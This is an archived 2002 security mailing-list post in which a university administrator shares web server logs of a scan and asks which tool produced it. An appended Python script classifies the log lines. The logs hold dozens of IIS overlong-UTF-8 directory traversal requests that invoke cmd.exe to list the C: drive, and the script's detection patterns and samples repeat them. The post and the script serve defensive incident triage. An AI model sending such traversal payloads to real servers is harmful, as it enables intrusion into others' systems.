Someone scanned our servers for vulnerabilities early yesterday morning. I am not sure what program they are using and I was wondering if anyone has seen this before. I know it's not LANguard, Retina, Super Scan, etc. It's fairly obvious they were looking for IIS and other vulnerabilities, but why does "GET http://www.microsoft.com/ HTTP/1.0" appear in it?

217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:55:53 -0500] "GET / HTTP/1.0" 200 15479 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:57:04 -0500] "GET http://www.microsoft.com/ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:12 -0500] "HEAD / HTTP/1.0" 200 - "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:13 -0500] "OPTIONS / HTTP/1.0" 403 2413 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:14 -0500] "GET /invalidfilename.htm HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:17 -0500] "GET /invalidfilename.cgi HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:18 -0500] "GET /../invalidfilename.htm HTTP/1.0" 400 2458 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:20 -0500] "GET /invalidfilename.htm HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:26 -0500] "GET /invalidfilename.cgi HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:28 -0500] "GET /../invalidfilename.htm HTTP/1.0" 400 2458 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:31 -0500] "GET /cgi-bin/ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:32 -0500] "GET /cgi-bin/ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:34 -0500] "GET /iisadmpwd/ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:35 -0500] "GET /iisadmpwd/ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:36 -0500] "GET /_vti_bin/ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:38 -0500] "GET /msadc/ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:39 -0500] "GET /scripts/ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:41 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:43 -0500] "GET /scripts/..%c0%af../winnt35/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:45 -0500] "GET /scripts/..%c0%af../winnt351/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:47 -0500] "GET /scripts/..%c0%af../wint/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:49 -0500] "GET /scripts/..%c0%af../windows/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:51 -0500] "GET /scripts/..%c0%af../winnt.sbs/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:53 -0500] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:55 -0500] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt35/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:57 -0500] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt351/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 302 2419 "" ""
147.134.41.18 gsa.creighton.edu - [14/Apr/2002:07:58:58 -0500] "HEAD / HTTP/1.0" 200 - "" "WhatsUp_Gold/7.0"
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:00 -0500] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../wint/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:02 -0500] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:04 -0500] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt.sbs/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:06 -0500] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:08 -0500] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt35/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:10 -0500] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt351/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:12 -0500] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../wint/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:15 -0500] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:17 -0500] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt.sbs/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:19 -0500] "GET /_vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:21 -0500] "GET /_vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt35/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:23 -0500] "GET /_vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt351/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:25 -0500] "GET /_vti_cnf/..%c0%af../..%c0%af../..%c0%af../wint/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:27 -0500] "GET /_vti_cnf/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:33 -0500] "GET /_vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt.sbs/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:38 -0500] "GET /cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:40 -0500] "GET /cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt35/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:42 -0500] "GET /cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt351/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:44 -0500] "GET /cgi-bin/..%c0%af../..%c0%af../..%c0%af../wint/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:46 -0500] "GET /cgi-bin/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:49 -0500] "GET /cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt.sbs/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:51 -0500] "GET /samples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:54 -0500] "GET /samples/..%c0%af../..%c0%af../..%c0%af../winnt35/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:56 -0500] "GET /samples/..%c0%af../..%c0%af../..%c0%af../winnt351/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:02 -0500] "GET /samples/..%c0%af../..%c0%af../..%c0%af../wint/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:04 -0500] "GET /samples/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:06 -0500] "GET /samples/..%c0%af../..%c0%af../..%c0%af../winnt.sbs/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:08 -0500] "GET /iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:10 -0500] "GET /iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt35/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:12 -0500] "GET /iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt351/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:15 -0500] "GET /iisadmpwd/..%c0%af../..%c0%af../..%c0%af../wint/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:17 -0500] "GET /iisadmpwd/..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:19 -0500] "GET /iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt.sbs/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:22 -0500] "GET /..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:24 -0500] "GET /..%c0%af../..%c0%af../..%c0%af../winnt35/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:26 -0500] "GET /..%c0%af../..%c0%af../..%c0%af../winnt351/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:28 -0500] "GET /..%c0%af../..%c0%af../..%c0%af../wint/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:34 -0500] "GET /..%c0%af../..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:08:00:36 -0500] "GET /..%c0%af../..%c0%af../..%c0%af../winnt.sbs/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""

ISP has been contacted but only automated replies have been sent back to me.

Brenna
AIM - abosolut x psycho
Yahoo! - absolut_contagion
ICQ - 1363187
http://gsa.creighton.edu

-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GSS d-- s: a-- C++ UL++++ P+ L+ E W++ N+ o-- K- w+ O-- M V-- PS++ PE Y+ PGP- t-- 5-- X++ R- tv+ b+++ DI D+ G e* h- r++ x+
------END GEEK CODE BLOCK------

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Mon Apr 15 2002 - 10:37:18 PDT
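
An added triage example, not part of the original post: a small Python classifier for log lines in the format shown above. It canonicalises each request path before matching, because %c0%af is an overlong two-byte UTF-8 encoding of "/", and it flags a request-target in absolute form that names a different host, which is the form a client sends to a proxy. The tag names and the "not_rejected" counter are assumptions made for this example.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes
# Sample entries taken from the log in the post (mail-wrap spaces removed).
SAMPLE = r'''217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:57:04 -0500] "GET http://www.microsoft.com/ HTTP/1.0" 404 2440 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:18 -0500] "GET /../invalidfilename.htm HTTP/1.0" 400 2458 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:58:41 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 302 2419 "" ""
217.225.211.209 gsa.creighton.edu - [14/Apr/2002:07:59:38 -0500] "GET /cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 2440 "" ""
147.134.41.18 gsa.creighton.edu - [14/Apr/2002:07:58:58 -0500] "HEAD / HTTP/1.0" 200 - "" "WhatsUp_Gold/7.0"'''
LINE = re.compile(r'^(\S+) (\S+) \S+ \[[^\]]+\] "\S+ (.+) HTTP/[\d.]+" (\d{3}) ')
# 0xC0/0xC1 are never valid UTF-8 lead bytes; they only start overlong ASCII.
OVERLONG = re.compile(r'%c([01])%([89ab][0-9a-f])', re.I)

def decode_overlong(path):
    """Replace overlong two-byte sequences with the ASCII character they encode."""
    def fix(m):  # code point = (low 5 bits of lead byte) << 6 | low 6 bits of next byte
        return chr((int(m.group(1)) << 6) | (int(m.group(2), 16) & 0x3F))
    return OVERLONG.sub(fix, path)

def classify(line):
    """Return (client, status, tags) for one log line, or None if unparsable."""
    m = LINE.match(line)
    if not m:
        return None
    client, vhost, target, status = m.groups()
    tags = set()
    absolute = re.match(r'https?://([^/:]+)', target, re.I)
    if absolute and absolute.group(1).lower() != vhost.lower():
        tags.add('proxy-probe')        # absolute-form URI naming another host
    path = target.split('?', 1)[0]
    if OVERLONG.search(path):
        tags.add('overlong-utf8')
    canon = unquote_to_bytes(decode_overlong(path)).decode('latin-1').replace('\\', '/')
    if '..' in canon.split('/'):
        tags.add('traversal')          # dot-dot segment after canonicalisation
    if canon.lower().endswith('/cmd.exe'):
        tags.add('cmd-exe')
    return client, int(status), tags

def summarize(log_text):
    """Per client: tag counts and how many flagged requests were not answered 4xx."""
    report = {}
    for client, status, tags in filter(None, map(classify, log_text.splitlines())):
        if tags:
            entry = report.setdefault(client, {'tags': Counter(), 'not_rejected': 0})
            entry['tags'].update(tags)
            entry['not_rejected'] += not 400 <= status < 500
    return report

print(summarize(SAMPLE))
```

Requests counted under "not_rejected" (the 302 responses in this log) are the ones to check against the server's configuration first.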